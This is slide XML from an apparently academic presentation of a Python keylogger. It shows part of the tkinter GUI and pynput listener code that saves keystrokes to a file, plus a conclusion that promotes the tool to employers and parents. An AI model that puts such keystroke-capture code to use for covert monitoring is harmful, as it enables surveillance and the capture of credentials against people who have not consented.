              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    listener = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keyboard.Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>listener.start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(state='normal')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>listener.stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(text="Keylogger stopped.")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(state='normal')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(state='disabled’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root = Tk()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("Keylogger")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(anchor=CENTER)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>label.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>start_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = Button(root, text="Start", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(side=LEFT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stop_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = Button(root, text="Stop", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stop_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(side=RIGHT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("250x250")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root.mainloop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="9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92779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10681335" cy="567463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>RESULTS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1"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pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C47629CC-F0C1-8E62-D43C-41E441BBA031}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="5590"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1219201"/>
            <a:ext cx="5486400" cy="4343400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71253DA9-6518-070D-491B-218057330EB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5726"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149009" y="1404731"/>
            <a:ext cx="5711687" cy="423407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841D0-364C-703C-0843-5D18A16C6175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755332" y="385444"/>
            <a:ext cx="10681335" cy="553998"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CONCLUSION</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600"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7101D2FC-EBB6-6B2C-5867-BAA90B18CED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1577340"/>
            <a:ext cx="9677400" cy="2492990"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Our Key Logger project successfully addressed the need for an efficient and user-friendly keystroke logging solution. We developed a lightweight, reliable application using Python and `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>`, providing real-time keystroke logging with minimal system impact. Our solution ensures data security and ease of use with multiple logging formats. The project achieved low latency, high accuracy, and maintained low resource utilization. Positive feedback from security professionals, employers, and parents highlighted its efficiency, user-friendliness, and cost-effectiveness. Moving forward, we plan to introduce more customization options, support additional languages, and implement advanced security features. The positive results and user satisfaction validate the effectiveness and value of our Key Logger, and we are committed to continuous improvement to meet future user needs. Thank you for your attention and interest.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1098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AE2FA-C62C-4B2B-B6D2-14D1217733E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Project </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Link :</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33F11AC9-F90C-4A91-8D09-B3F745413877}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
